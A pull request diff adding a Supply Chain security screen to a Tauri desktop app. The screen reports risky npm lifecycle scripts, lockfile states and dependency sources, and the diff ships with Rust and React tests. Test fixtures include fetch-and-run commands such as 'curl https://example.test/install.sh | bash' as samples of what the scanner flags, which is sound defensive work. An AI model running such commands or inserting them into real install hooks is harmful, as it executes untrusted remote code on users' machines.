### PR TITLE
feat(tauri): expose supply chain security screen

### DIFF
--- a/apps/tauri/README.md
+++ b/apps/tauri/README.md
@@ -64,6 +64,7 @@ refreshes set it to `false` so they do not change the generated-artifact baselin
 - Safe cleanup with Trash or permanent delete confirmation
 - Activity history viewer backed by shared, versioned core history storage
 - Explicit scans return the generated-artifact snapshot comparison produced by Core
+- Explicit offline Supply Chain scans expose lifecycle scripts, lockfile status, and dependency-source findings
 
 Activity persistence is auxiliary to scan, cleanup, and security results. If a
 history write fails, the operation response remains available and includes an
@@ -81,7 +82,7 @@ additive `historyWarning` for the desktop status surface.
 
 ## Desktop module navigation
 
-The sidebar keeps the planned Desktop information architecture in
+The sidebar keeps the Desktop information architecture in
 `src/model/categories.ts`:
 
 ```text
@@ -99,7 +100,7 @@ Workspace
   Activity
 
 Security
-  Supply Chain (planned)
+  Supply Chain
   GitHub Actions (planned)
   Executable Integrity (planned)
 ```

--- a/apps/tauri/src-tauri/src/contract.rs
+++ b/apps/tauri/src-tauri/src/contract.rs
@@ -357,6 +357,7 @@ pub(crate) struct LifecycleScriptDto {
 #[serde(rename_all = "camelCase")]
 pub(crate) struct SecurityScanResponse {
     pub(crate) findings: Vec<SecurityFindingDto>,
+    pub(crate) lifecycle_scripts: Vec<LifecycleScriptDto>,
     pub(crate) lifecycle_warnings: Vec<SecurityWarningDto>,
     pub(crate) lockfiles: Vec<LockfileCheckDto>,
     pub(crate) manifests: Vec<String>,
@@ -382,6 +383,7 @@ pub(crate) struct SecurityWarningDto {
     pub(crate) script_type: String,
     pub(crate) command: String,
     pub(crate) risk_level: RiskLevelDto,
+    pub(crate) reason: String,
 }
 
 #[derive(Debug, Serialize, PartialEq, Eq)]
@@ -573,6 +575,7 @@ impl From<SecurityReport> for SecurityScanResponse {
     fn from(report: SecurityReport) -> Self {
         Self {
             findings: report.findings.into_iter().map(Into::into).collect(),
+            lifecycle_scripts: Vec::new(),
             lifecycle_warnings: report
                 .lifecycle_warnings
                 .into_iter()
@@ -609,6 +612,7 @@ impl From<SecurityWarning> for SecurityWarningDto {
             script_type: warning.script_type,
             command: warning.command,
             risk_level: warning.risk_level.into(),
+            reason: warning.reason,
         }
     }
 }
@@ -1076,12 +1080,20 @@ mod tests {
                 Some("curl payload | bash".to_owned()),
                 "Remote script is piped to a shell.",
             )],
+            lifecycle_warnings: vec![SecurityWarning {
+                package: "demo".to_owned(),
+                script_type: "postinstall".to_owned(),
+                command: "curl payload | bash".to_owned(),
+                risk_level: RiskLevel::High,
+                reason: "Remote script is piped to a shell.".to_owned(),
+            }],
             ..SecurityReport::default()
         };
         let response: SecurityScanResponse = report.into();
+        let wire = serde_json::to_value(response).unwrap();
 
         assert_eq!(
-            serde_json::to_value(response).unwrap()["findings"][0],
+            wire["findings"][0],
             json!({
                 "path": "/workspace/package.json",
                 "rule": "suspicious-script",
@@ -1090,6 +1102,10 @@ mod tests {
                 "evidence": "curl payload | bash",
                 "reason": "Remote script is piped to a shell."
             })
+        );
+        assert_eq!(
+            wire["lifecycleWarnings"][0]["reason"],
+            "Remote script is piped to a shell."
         );
     }
 

--- a/apps/tauri/src-tauri/src/contract.rs
+++ b/apps/tauri/src-tauri/src/contract.rs
@@ -382,6 +382,7 @@ pub(crate) struct CleanupHistoryEntryDto {
 #[serde(rename_all = "camelCase")]
 pub(crate) struct LifecycleScriptDto {
     pub(crate) package: String,
+    pub(crate) manifest_path: String,
     pub(crate) package_manager: PackageManagerDto,
     pub(crate) script_type: ScriptTypeDto,
     pub(crate) command: String,
@@ -897,6 +898,7 @@ impl From<LifecycleScript> for LifecycleScriptDto {
     fn from(script: LifecycleScript) -> Self {
         Self {
             package: script.package,
+            manifest_path: script.manifest_path.display().to_string(),
             package_manager: script.package_manager.into(),
             script_type: script.script_type.into(),
             command: script.command,
@@ -909,7 +911,11 @@ impl From<SecurityReport> for SecurityScanResponse {
     fn from(report: SecurityReport) -> Self {
         Self {
             findings: report.findings.into_iter().map(Into::into).collect(),
-            lifecycle_scripts: Vec::new(),
+            lifecycle_scripts: report
+                .lifecycle_scripts
+                .into_iter()
+                .map(Into::into)
+                .collect(),
             lifecycle_warnings: report
                 .lifecycle_warnings
                 .into_iter()
@@ -1681,6 +1687,7 @@ mod tests {
     fn lifecycle_script_wire_values_are_stable() {
         let response = LifecycleScriptDto {
             package: "demo".to_string(),
+            manifest_path: "/workspace/package.json".to_string(),
             package_manager: PackageManagerDto::Pnpm,
             script_type: ScriptTypeDto::PrepublishOnly,
             command: "node publish.js".to_string(),
@@ -1691,6 +1698,7 @@ mod tests {
             serde_json::to_value(response).unwrap(),
             json!({
                 "package": "demo",
+                "manifestPath": "/workspace/package.json",
                 "packageManager": "pnpm",
                 "scriptType": "prepublishOnly",
                 "command": "node publish.js",
@@ -1703,6 +1711,7 @@ mod tests {
     fn critical_lifecycle_risk_is_preserved_in_wire_contract() {
         let response = LifecycleScriptDto {
             package: "demo".to_string(),
+            manifest_path: "/workspace/package.json".to_string(),
             package_manager: PackageManagerDto::Npm,
             script_type: ScriptTypeDto::Postinstall,
             command: "curl payload && ./payload".to_string(),
@@ -1713,6 +1722,7 @@ mod tests {
             serde_json::to_value(response).unwrap(),
             json!({
                 "package": "demo",
+                "manifestPath": "/workspace/package.json",
                 "packageManager": "npm",
                 "scriptType": "postinstall",
                 "command": "curl payload && ./payload",
@@ -1920,6 +1930,14 @@ mod tests {
                 risk_level: RiskLevel::High,
                 reason: "Remote script is piped to a shell.".to_owned(),
             }],
+            lifecycle_scripts: vec![LifecycleScript {
+                package: "demo".to_owned(),
+                manifest_path: "/workspace/node_modules/demo/package.json".into(),
+                package_manager: PackageManager::Npm,
+                script_type: ScriptType::Postinstall,
+                command: "curl payload | bash".to_owned(),
+                risk_level: RiskLevel::High,
+            }],
             ..SecurityReport::default()
         };
         let response: SecurityScanResponse = report.into();
@@ -1939,6 +1957,10 @@ mod tests {
         assert_eq!(
             wire["lifecycleWarnings"][0]["reason"],
             "Remote script is piped to a shell."
+        );
+        assert_eq!(
+            wire["lifecycleScripts"][0]["manifestPath"],
+            "/workspace/node_modules/demo/package.json"
         );
     }
 

--- a/apps/tauri/src-tauri/src/lib.rs
+++ b/apps/tauri/src-tauri/src/lib.rs
@@ -587,7 +587,13 @@ async fn security_scan(options: RunOptions) -> Result<SecurityScanResponse, Stri
             }
         };
 
+        let lifecycle_scripts = api::audit(&root, &ecosystems)
+            .map_err(|error| error.to_string())?
+            .into_iter()
+            .map(Into::into)
+            .collect();
         let mut response: SecurityScanResponse = report.clone().into();
+        response.lifecycle_scripts = lifecycle_scripts;
         response.history_warning = match history::record_security_scan(&root, &ecosystems, &report)
         {
             Ok(()) => None,

--- a/apps/tauri/src-tauri/src/lib.rs
+++ b/apps/tauri/src-tauri/src/lib.rs
@@ -699,13 +699,7 @@ async fn security_scan(options: RunOptions) -> Result<SecurityScanResponse, Stri
             }
         };
 
-        let lifecycle_scripts = api::audit(&root, &ecosystems)
-            .map_err(|error| error.to_string())?
-            .into_iter()
-            .map(Into::into)
-            .collect();
         let mut response: SecurityScanResponse = report.clone().into();
-        response.lifecycle_scripts = lifecycle_scripts;
         response.history_warning = match history::record_security_scan(&root, &ecosystems, &report)
         {
             Ok(()) => None,

--- a/apps/tauri/src/features/app-shell/AppShell.test.tsx
+++ b/apps/tauri/src/features/app-shell/AppShell.test.tsx
@@ -7,6 +7,7 @@ import {
   executeCleanup,
   loadActivityHistory,
   refreshStorageVolume,
+  securityScan,
 } from '../../lib/tauri';
 
 vi.mock('../../lib/tauri', () => ({
@@ -17,6 +18,7 @@ vi.mock('../../lib/tauri', () => ({
   refreshStorageVolume: vi.fn(),
   loadActivityHistory: vi.fn().mockResolvedValue([]),
   clearActivityHistory: vi.fn().mockResolvedValue(undefined),
+  securityScan: vi.fn(),
 }));
 
 const analyzedArtifact = {
@@ -66,7 +68,7 @@ describe('AppShell Overview navigation', () => {
     ['Dependencies', true],
     ['Artifact History', true],
     ['Activity', false],
-    ['Supply Chain', true],
+    ['Supply Chain', false],
     ['GitHub Actions', true],
     ['Executable Integrity', true],
   ])('navigates to the %s module without starting another operation', async (title, planned) => {
@@ -140,6 +142,33 @@ describe('AppShell Overview navigation', () => {
     expect(screen.getByRole('complementary', { name: 'Artifact inspector' })).toBeInTheDocument();
     expect(screen.getAllByText('/workspace/dustfril/target').length).toBeGreaterThan(0);
     expect(screen.getByRole('checkbox')).not.toBeChecked();
+  });
+
+  it('runs Supply Chain only after an explicit click and refreshes one history result', async () => {
+    vi.mocked(securityScan).mockResolvedValue({
+      findings: [],
+      lifecycleScripts: [],
+      lifecycleWarnings: [],
+      lockfiles: [
+        { path: '/workspace/package-lock.json', kind: 'PackageLockJson', status: 'Clean' },
+      ],
+      manifests: ['/workspace/package.json'],
+    });
+
+    render(<AppShell />);
+    await waitFor(() => expect(screen.getByRole('button', { name: 'Analyze Workspace' })).toBeEnabled());
+    fireEvent.click(screen.getByRole('button', { name: 'Supply Chain' }));
+
+    expect(screen.getByRole('heading', { name: 'Ready for an explicit scan' })).toBeInTheDocument();
+    expect(securityScan).not.toHaveBeenCalled();
+
+    fireEvent.click(screen.getByRole('button', { name: 'Scan Supply Chain' }));
+    await waitFor(() => expect(securityScan).toHaveBeenCalledOnce());
+    expect(securityScan).toHaveBeenCalledWith({
+      root: '/workspace',
+      ecosystems: ['Rust', 'Node', 'Java'],
+    });
+    expect(screen.getByRole('heading', { name: 'Scan completed with zero findings' })).toBeInTheDocument();
   });
 
   it('clears activity history only after confirmation and updates the sidebar count', async () => {

--- a/apps/tauri/src/features/app-shell/AppShell.tsx
+++ b/apps/tauri/src/features/app-shell/AppShell.tsx
@@ -7,6 +7,7 @@ import { useAppState } from './hooks/useAppState';
 import { HistoryView } from './views/HistoryView';
 import { ModulePlaceholderView } from './views/ModulePlaceholderView';
 import { OverviewView } from './views/OverviewView';
+import { SupplyChainView } from './views/SupplyChainView';
 import { WorkspaceView } from './views/WorkspaceView';
 
 export function AppShell() {
@@ -85,7 +86,20 @@ export function AppShell() {
             />
           ) : null}
 
-          {app.activeCategory !== 'overview' && !showingWorkspace && !showingActivity && activeConfig ? (
+          {app.activeCategory === 'security-supply-chain' ? (
+            <SupplyChainView
+              root={app.root}
+              operation={app.securityOperation}
+              canScan={app.canScanSecurity}
+              onScan={app.handleSecurityScan}
+            />
+          ) : null}
+
+          {app.activeCategory !== 'overview' &&
+          !showingWorkspace &&
+          !showingActivity &&
+          app.activeCategory !== 'security-supply-chain' &&
+          activeConfig ? (
             <ModulePlaceholderView
               config={activeConfig}
               onReturnToOverview={() => app.setActiveCategory('overview')}

--- a/apps/tauri/src/features/app-shell/hooks/useAppState.ts
+++ b/apps/tauri/src/features/app-shell/hooks/useAppState.ts
@@ -8,6 +8,7 @@ import {
   executeCleanup,
   loadActivityHistory,
   refreshStorageVolume,
+  securityScan,
 } from '../../../lib/tauri';
 import { categoryConfigs, type SidebarCategory } from '../../../model/categories';
 import {
@@ -22,6 +23,7 @@ import type {
   CleanupResultResponse,
   DeleteMode,
   StorageSummary,
+  SecurityScanResponse,
   VolumeStorage,
 } from '../../../types/workflow';
 import { cleanupAgeOptions, defaultCleanupAgeDays, deleteModes, ecosystems } from '../../../types/workflow';
@@ -53,7 +55,12 @@ export function useAppState() {
     reduceAsyncOperation<WorkspaceAnalysisResponse>,
     idleAsyncOperation<WorkspaceAnalysisResponse>(),
   );
+  const [securityOperation, dispatchSecurityOperation] = useReducer(
+    reduceAsyncOperation<SecurityScanResponse>,
+    idleAsyncOperation<SecurityScanResponse>(),
+  );
   const workspaceRequestRef = useRef(0);
+  const securityRequestRef = useRef(0);
   const actionRequestRef = useRef(0);
 
   useEffect(() => {
@@ -149,6 +156,11 @@ export function useAppState() {
       type: 'invalidate',
       requestId: workspaceRequestRef.current,
     });
+    securityRequestRef.current += 1;
+    dispatchSecurityOperation({
+      type: 'invalidate',
+      requestId: securityRequestRef.current,
+    });
     actionRequestRef.current += 1;
     setRoot(nextRoot);
     setError(null);
@@ -184,6 +196,47 @@ export function useAppState() {
     }
 
     await analyzeWorkspaceWithPolicy(cleanupAgeDays, true, true);
+  }
+
+  async function handleSecurityScan() {
+    if (busyAction !== null || !root) {
+      return;
+    }
+
+    await runAction('security-scan', async () => {
+      const requestId = ++securityRequestRef.current;
+      dispatchSecurityOperation({ type: 'start', requestId });
+
+      try {
+        const response = await securityScan({
+          root,
+          ecosystems: [...ecosystems],
+        });
+
+        dispatchSecurityOperation({
+          type: 'success',
+          requestId,
+          data: response,
+          warnings: response.historyWarning ? [response.historyWarning] : [],
+        });
+
+        if (requestId !== securityRequestRef.current) {
+          return;
+        }
+
+        const refreshedHistory = await loadActivityHistory();
+        if (requestId === securityRequestRef.current) {
+          setHistoryEntries(refreshedHistory);
+        }
+      } catch (invokeError) {
+        dispatchSecurityOperation({
+          type: 'error',
+          requestId,
+          error: String(invokeError),
+        });
+        throw invokeError;
+      }
+    });
   }
 
   async function analyzeWorkspaceWithPolicy(
@@ -462,6 +515,8 @@ export function useAppState() {
     confirmDialogOpen,
     confirmSamplePaths,
     workspaceOperation,
+    securityOperation,
+    canScanSecurity: busyAction === null && root.length > 0,
     canAnalyze,
     canReviewCleanup,
     summary,
@@ -476,6 +531,7 @@ export function useAppState() {
     handleRootChange,
     handleChooseWorkspace,
     handleAnalyzeWorkspace,
+    handleSecurityScan,
     handleCleanupAgeChange,
     handleClearHistory,
     handleRequestCleanup,

--- a/apps/tauri/src/features/app-shell/views/SupplyChainView.test.tsx
+++ b/apps/tauri/src/features/app-shell/views/SupplyChainView.test.tsx
@@ -1,0 +1,157 @@
+import { fireEvent, render, screen } from '@testing-library/react';
+import { describe, expect, it, vi } from 'vitest';
+import { SupplyChainView } from './SupplyChainView';
+import type { SecurityScanResponse } from '../../../types/workflow';
+
+const report: SecurityScanResponse = {
+  findings: [
+    {
+      path: '/workspace/package.json',
+      rule: 'suspicious-script',
+      package: 'demo',
+      riskLevel: 'High',
+      evidence: 'curl https://example.test/install.sh | bash',
+      reason: 'A remote script is piped to a shell.',
+    },
+    {
+      path: '/workspace/package.json',
+      rule: 'untrusted-dependency',
+      package: 'demo-dependency',
+      riskLevel: 'Medium',
+      evidence: 'git+https://example.test/demo-dependency.git',
+      reason: 'Dependency uses a non-registry source.',
+    },
+  ],
+  lifecycleScripts: [
+    {
+      package: 'demo',
+      packageManager: 'npm',
+      scriptType: 'postinstall',
+      command: 'curl https://example.test/install.sh | bash',
+      riskLevel: 'High',
+    },
+    {
+      package: 'demo',
+      packageManager: 'npm',
+      scriptType: 'prepare',
+      command: 'node scripts/build.js',
+      riskLevel: 'None',
+    },
+  ],
+  lifecycleWarnings: [
+    {
+      package: 'demo',
+      scriptType: 'postinstall',
+      command: 'curl https://example.test/install.sh | bash',
+      riskLevel: 'High',
+      reason: 'A remote script is piped to a shell.',
+    },
+  ],
+  lockfiles: [
+    { path: '/workspace/package-lock.json', kind: 'PackageLockJson', status: 'Clean' },
+    { path: '/workspace/pnpm-lock.yaml', kind: 'PnpmLockYaml', status: 'Modified' },
+    { path: '/workspace/bun.lock', kind: 'BunLock', status: 'Untracked' },
+    { path: '/workspace/Cargo.lock', kind: 'CargoLock', status: 'Missing' },
+  ],
+  manifests: ['/workspace/package.json'],
+};
+
+describe('SupplyChainView', () => {
+  it('requires an explicit scan and does not scan while rendering', () => {
+    const onScan = vi.fn();
+
+    render(
+      <SupplyChainView
+        root="/workspace"
+        operation={{ status: 'idle', requestId: 0 }}
+        canScan
+        onScan={onScan}
+      />,
+    );
+
+    expect(screen.getByRole('heading', { name: 'Ready for an explicit scan' })).toBeInTheDocument();
+    expect(onScan).not.toHaveBeenCalled();
+
+    fireEvent.click(screen.getByRole('button', { name: 'Scan Supply Chain' }));
+    expect(onScan).toHaveBeenCalledOnce();
+  });
+
+  it('renders lifecycle context, lockfile states, and evidence-backed findings', () => {
+    render(
+      <SupplyChainView
+        root="/workspace"
+        operation={{ status: 'success', requestId: 1, data: report }}
+        canScan
+        onScan={vi.fn()}
+      />,
+    );
+
+    expect(screen.getByText('demo-dependency')).toBeInTheDocument();
+    expect(screen.getByText('No security finding was reported for this lifecycle hook.')).toBeInTheDocument();
+    expect(screen.getByText('Safe')).toBeInTheDocument();
+    expect(screen.getByText('postinstall')).toBeInTheDocument();
+    expect(screen.getByText('Clean')).toBeInTheDocument();
+    expect(screen.getByText('Modified')).toBeInTheDocument();
+    expect(screen.getByText('Untracked')).toBeInTheDocument();
+    expect(screen.getByText('Missing')).toBeInTheDocument();
+    expect(screen.getByText('A remote script is piped to a shell.')).toBeInTheDocument();
+    expect(screen.getByText('Dependency uses a non-registry source.')).toBeInTheDocument();
+    expect(screen.getByText('Node · npm · pnpm · bun · Cargo')).toBeInTheDocument();
+  });
+
+  it('keeps no-input and inspection-failure states distinct from clean results', () => {
+    const { rerender } = render(
+      <SupplyChainView
+        root="/workspace"
+        operation={{
+          status: 'success',
+          requestId: 1,
+          data: { findings: [], lifecycleScripts: [], lifecycleWarnings: [], lockfiles: [], manifests: [] },
+        }}
+        canScan
+        onScan={vi.fn()}
+      />,
+    );
+
+    expect(screen.getByRole('heading', { name: 'No supported project input found' })).toBeInTheDocument();
+    expect(screen.queryByRole('heading', { name: 'Scan completed with zero findings' })).not.toBeInTheDocument();
+
+    rerender(
+      <SupplyChainView
+        root="/workspace"
+        operation={{ status: 'error', requestId: 2, error: 'package.json: malformed JSON' }}
+        canScan
+        onScan={vi.fn()}
+      />,
+    );
+
+    expect(screen.getByRole('heading', { name: 'Supply-chain inspection failed' })).toBeInTheDocument();
+    expect(screen.getByText('package.json: malformed JSON')).toBeInTheDocument();
+  });
+
+  it('shows unsupported or not-applicable lockfile scope without inventing Missing', () => {
+    render(
+      <SupplyChainView
+        root="/workspace"
+        operation={{
+          status: 'success',
+          requestId: 1,
+          data: {
+            findings: [],
+            lifecycleScripts: [],
+            lifecycleWarnings: [],
+            lockfiles: [],
+            manifests: ['/workspace/package.json'],
+          },
+        }}
+        canScan
+        onScan={vi.fn()}
+      />,
+    );
+
+    expect(screen.getByText(/Unsupported or not-applicable package managers/)).toBeInTheDocument();
+    expect(screen.queryByText('Missing')).not.toBeInTheDocument();
+    expect(screen.getByRole('heading', { name: 'No findings in the analyzed inputs' })).toBeInTheDocument();
+    expect(screen.queryByRole('heading', { name: 'Scan completed with zero findings' })).not.toBeInTheDocument();
+  });
+});

--- a/apps/tauri/src/features/app-shell/views/SupplyChainView.test.tsx
+++ b/apps/tauri/src/features/app-shell/views/SupplyChainView.test.tsx
@@ -25,6 +25,7 @@ const report: SecurityScanResponse = {
   lifecycleScripts: [
     {
       package: 'demo',
+      manifestPath: '/workspace/node_modules/demo/package.json',
       packageManager: 'npm',
       scriptType: 'postinstall',
       command: 'curl https://example.test/install.sh | bash',
@@ -32,6 +33,7 @@ const report: SecurityScanResponse = {
     },
     {
       package: 'demo',
+      manifestPath: '/workspace/package.json',
       packageManager: 'npm',
       scriptType: 'prepare',
       command: 'node scripts/build.js',
@@ -88,7 +90,9 @@ describe('SupplyChainView', () => {
 
     expect(screen.getByText('demo-dependency')).toBeInTheDocument();
     expect(screen.getByText('No security finding was reported for this lifecycle hook.')).toBeInTheDocument();
-    expect(screen.getByText('Safe')).toBeInTheDocument();
+    expect(screen.getByText('No finding')).toBeInTheDocument();
+    expect(screen.getByText('/workspace/node_modules/demo/package.json')).toBeInTheDocument();
+    expect(screen.getAllByText('Core risk classification')).toHaveLength(2);
     expect(screen.getByText('postinstall')).toBeInTheDocument();
     expect(screen.getByText('Clean')).toBeInTheDocument();
     expect(screen.getByText('Modified')).toBeInTheDocument();
@@ -97,6 +101,42 @@ describe('SupplyChainView', () => {
     expect(screen.getByText('A remote script is piped to a shell.')).toBeInTheDocument();
     expect(screen.getByText('Dependency uses a non-registry source.')).toBeInTheDocument();
     expect(screen.getByText('Node · npm · pnpm · bun · Cargo')).toBeInTheDocument();
+  });
+
+  it('includes Core lifecycle risk in the summary without calling an unflagged hook safe', () => {
+    render(
+      <SupplyChainView
+        root="/workspace"
+        operation={{
+          status: 'success',
+          requestId: 1,
+          data: {
+            findings: [],
+            lifecycleScripts: [
+              {
+                package: 'demo',
+                manifestPath: '/workspace/package.json',
+                packageManager: 'npm',
+                scriptType: 'prepare',
+                command: 'node scripts/build.js',
+                riskLevel: 'Medium',
+              },
+            ],
+            lifecycleWarnings: [],
+            lockfiles: [
+              { path: '/workspace/package-lock.json', kind: 'PackageLockJson', status: 'Clean' },
+            ],
+            manifests: ['/workspace/package.json'],
+          },
+        }}
+        canScan
+        onScan={vi.fn()}
+      />,
+    );
+
+    expect(screen.getAllByText('Medium')).toHaveLength(2);
+    expect(screen.getByText('No finding')).toBeInTheDocument();
+    expect(screen.queryByText('Safe')).not.toBeInTheDocument();
   });
 
   it('keeps no-input and inspection-failure states distinct from clean results', () => {

--- a/apps/tauri/src/features/app-shell/views/SupplyChainView.tsx
+++ b/apps/tauri/src/features/app-shell/views/SupplyChainView.tsx
@@ -1,0 +1,414 @@
+import { AsyncStatePanel } from '../../../components/AsyncStatePanel/AsyncStatePanel';
+import type { AsyncOperationState } from '../../../model/async';
+import type {
+  LifecycleScript,
+  LockfileCheck,
+  RiskLevel,
+  SecurityFinding,
+  SecurityScanResponse,
+} from '../../../types/workflow';
+
+type SupplyChainViewProps = {
+  root: string;
+  operation: AsyncOperationState<SecurityScanResponse>;
+  canScan: boolean;
+  onScan: () => void | Promise<void>;
+};
+
+export function SupplyChainView(props: SupplyChainViewProps) {
+  const report = reportFromOperation(props.operation);
+  const error = props.operation.status === 'error' ? props.operation.error : null;
+
+  return (
+    <div className="supply-chain-view">
+      <header className="supply-chain-header">
+        <div className="supply-chain-heading">
+          <p className="eyebrow">Security</p>
+          <h1>Supply Chain</h1>
+          <p>
+            Inspect local lifecycle scripts, dependency sources, and supported lockfiles with the
+            offline Core analyzer. Scripts are never executed and no external service is contacted.
+          </p>
+          <p className="supply-chain-root" title={props.root}>
+            Workspace: {props.root || 'No workspace selected'}
+          </p>
+        </div>
+        <button
+          type="button"
+          className="supply-chain-scan-button"
+          onClick={() => void props.onScan()}
+          disabled={!props.canScan}
+        >
+          Scan Supply Chain
+        </button>
+      </header>
+
+      {props.operation.status === 'idle' ? (
+        <AsyncStatePanel
+          status="idle"
+          title="Ready for an explicit scan"
+          description="Choose Scan Supply Chain to inspect the selected workspace. Navigating here does not start a scan."
+        />
+      ) : null}
+
+      {props.operation.status === 'loading' ? (
+        <AsyncStatePanel
+          status="loading"
+          title="Inspecting supply chain inputs"
+          description="DustFril is reading supported manifests and lockfiles and applying offline rules."
+        />
+      ) : null}
+
+      {props.operation.status === 'error' && !report ? (
+        <AsyncStatePanel
+          status="error"
+          title="Supply-chain inspection failed"
+          description="The required project input could not be inspected. Malformed or unreadable input is not treated as clean."
+          error={error ?? 'The supply-chain scan failed.'}
+        />
+      ) : null}
+
+      {report ? (
+        <SupplyChainResults
+          report={report}
+          staleError={error}
+          partial={props.operation.status === 'partial'}
+        />
+      ) : null}
+    </div>
+  );
+}
+
+function SupplyChainResults({
+  report,
+  staleError,
+  partial,
+}: {
+  report: SecurityScanResponse;
+  staleError: string | null;
+  partial: boolean;
+}) {
+  const lifecycleScripts = report.lifecycleScripts ?? [];
+  const findings = report.findings ?? [];
+  const lifecycleFindings = findings.filter((finding) => finding.rule === 'suspicious-script');
+  const dependencyFindings = findings.filter((finding) => finding.rule !== 'suspicious-script');
+  const highestRisk = highestRiskLevel(findings);
+  const hasSupportedInput =
+    report.manifests.length > 0 || report.lockfiles.length > 0 || lifecycleScripts.length > 0;
+  const hasUnsupportedScope =
+    report.lockfiles.length === 0 &&
+    report.manifests.some((path) => fileName(path) === 'package.json');
+  const hasWarnings = partial || hasUnsupportedScope;
+  const warnings = [
+    report.historyWarning,
+    hasUnsupportedScope
+      ? 'No supported lockfile format was inspected for this package manager; the result is partial.'
+      : undefined,
+  ].filter((warning): warning is string => Boolean(warning));
+  const context = scanContext(report, lifecycleScripts);
+
+  return (
+    <div className="supply-chain-results">
+      {staleError ? (
+        <div className="supply-chain-scan-error" role="status">
+          The latest scan failed: {staleError}. Showing the previous result until another scan
+          completes.
+        </div>
+      ) : null}
+
+      {hasWarnings ? (
+        <AsyncStatePanel
+          status="partial"
+          title="Scan completed with a warning"
+          description="The security result is available, but part of the requested scope needs review."
+          warnings={warnings}
+        />
+      ) : null}
+
+      <section className="supply-chain-summary-grid" aria-label="Supply-chain scan summary">
+        <SummaryCard
+          value={
+            !hasSupportedInput
+              ? 'No input'
+                : findings.length
+                  ? 'Findings'
+                : hasWarnings
+                  ? 'Partial'
+                  : 'No findings'
+          }
+          label="Scan result"
+        />
+        <SummaryCard value={findings.length} label="Findings" />
+        <SummaryCard value={highestRisk ?? 'None'} label="Highest risk" />
+        <SummaryCard value={context.join(' · ') || 'Unknown'} label="Ecosystem / manager" />
+      </section>
+
+      {!hasSupportedInput ? (
+        <AsyncStatePanel
+          status="empty"
+          title="No supported project input found"
+          description="No supported package manifest, lifecycle script, or lockfile was returned. This is not a clean security verdict."
+        />
+      ) : null}
+
+      <section className="supply-chain-section" aria-labelledby="lifecycle-scripts-heading">
+        <SectionHeading
+          id="lifecycle-scripts-heading"
+          title="Lifecycle scripts"
+          description="Core-discovered install and lifecycle hooks. A listed script is not itself a malicious finding."
+        />
+        {lifecycleScripts.length ? (
+          <div className="supply-chain-script-list">
+            {lifecycleScripts.map((script, index) => (
+              <LifecycleScriptCard
+                key={`${script.package}-${script.scriptType}-${index}`}
+                script={script}
+                finding={findLifecycleFinding(script, lifecycleFindings)}
+                source={sourceForScript(script, report)}
+              />
+            ))}
+          </div>
+        ) : (
+          <p className="supply-chain-section-empty">No supported lifecycle hooks were found.</p>
+        )}
+      </section>
+
+      <section className="supply-chain-section" aria-labelledby="lockfile-status-heading">
+        <SectionHeading
+          id="lockfile-status-heading"
+          title="Lockfile status"
+          description="Core-reported integrity state for supported lockfile formats."
+        />
+        {report.lockfiles.length ? (
+          <div className="supply-chain-lockfile-table" role="table" aria-label="Lockfile status">
+            <div className="supply-chain-lockfile-row supply-chain-lockfile-header" role="row">
+              <span role="columnheader">Lockfile</span>
+              <span role="columnheader">Format</span>
+              <span role="columnheader">Status</span>
+            </div>
+            {report.lockfiles.map((lockfile) => (
+              <LockfileRow key={`${lockfile.path}-${lockfile.kind}`} lockfile={lockfile} />
+            ))}
+          </div>
+        ) : (
+          <p className="supply-chain-section-empty">
+            No supported lockfile was checked. Unsupported or not-applicable package managers are
+            not reported as a missing npm lockfile.
+          </p>
+        )}
+      </section>
+
+      <section className="supply-chain-section" aria-labelledby="dependency-findings-heading">
+        <SectionHeading
+          id="dependency-findings-heading"
+          title="Dependency source findings"
+          description="Evidence-backed dependency and lockfile findings from the offline Core analysis."
+        />
+        {dependencyFindings.length ? (
+          <div className="supply-chain-finding-list">
+            {dependencyFindings.map((finding, index) => (
+              <FindingCard finding={finding} key={`${finding.path}-${finding.rule}-${index}`} />
+            ))}
+          </div>
+        ) : (
+          <p className="supply-chain-section-empty">No dependency source or lockfile findings.</p>
+        )}
+      </section>
+
+      {!findings.length && hasSupportedInput ? (
+        <AsyncStatePanel
+          status={hasWarnings ? 'partial' : 'success'}
+          title={hasWarnings ? 'No findings in the analyzed inputs' : 'Scan completed with zero findings'}
+          description={
+            hasWarnings
+              ? 'The analyzed inputs produced no findings, but the warning above still needs review.'
+              : 'The inspected inputs produced no findings from the supported offline rules.'
+          }
+        />
+      ) : null}
+    </div>
+  );
+}
+
+function LifecycleScriptCard({
+  script,
+  finding,
+  source,
+}: {
+  script: LifecycleScript;
+  finding: SecurityFinding | undefined;
+  source: string;
+}) {
+  const risk = finding?.riskLevel ?? script.riskLevel;
+
+  return (
+    <article className={`supply-chain-card supply-chain-risk-${risk.toLowerCase()}`}>
+      <div className="supply-chain-card-header">
+        <div>
+          <span className="supply-chain-card-kicker">{script.scriptType}</span>
+          <h3>{script.package}</h3>
+        </div>
+        <span className="supply-chain-risk-badge">{finding ? risk : 'Safe'}</span>
+      </div>
+      <dl className="supply-chain-details">
+        <div>
+          <dt>Package manager</dt>
+          <dd>{script.packageManager}</dd>
+        </div>
+        <div>
+          <dt>Source</dt>
+          <dd title={source}>{source}</dd>
+        </div>
+        <div>
+          <dt>Command</dt>
+          <dd className="supply-chain-evidence">{script.command}</dd>
+        </div>
+      </dl>
+      <p className="supply-chain-reason">
+        {finding?.reason ?? 'No security finding was reported for this lifecycle hook.'}
+      </p>
+    </article>
+  );
+}
+
+function LockfileRow({ lockfile }: { lockfile: LockfileCheck }) {
+  return (
+    <div className="supply-chain-lockfile-row" role="row">
+      <span title={lockfile.path}>{fileName(lockfile.path)}</span>
+      <span>{lockfileFormatLabel(lockfile.kind)}</span>
+      <span className={`supply-chain-lockfile-status supply-chain-lockfile-${lockfile.status.toLowerCase()}`}>
+        {lockfile.status}
+      </span>
+    </div>
+  );
+}
+
+function FindingCard({ finding }: { finding: SecurityFinding }) {
+  return (
+    <article className={`supply-chain-card supply-chain-risk-${finding.riskLevel.toLowerCase()}`}>
+      <div className="supply-chain-card-header">
+        <div>
+          <span className="supply-chain-card-kicker">{findingLabel(finding.rule)}</span>
+          <h3>{finding.package ?? 'Workspace input'}</h3>
+        </div>
+        <span className="supply-chain-risk-badge">{finding.riskLevel}</span>
+      </div>
+      <dl className="supply-chain-details">
+        <div>
+          <dt>Source</dt>
+          <dd title={finding.path}>{finding.path}</dd>
+        </div>
+        {finding.evidence ? (
+          <div>
+            <dt>Evidence</dt>
+            <dd className="supply-chain-evidence">{finding.evidence}</dd>
+          </div>
+        ) : null}
+      </dl>
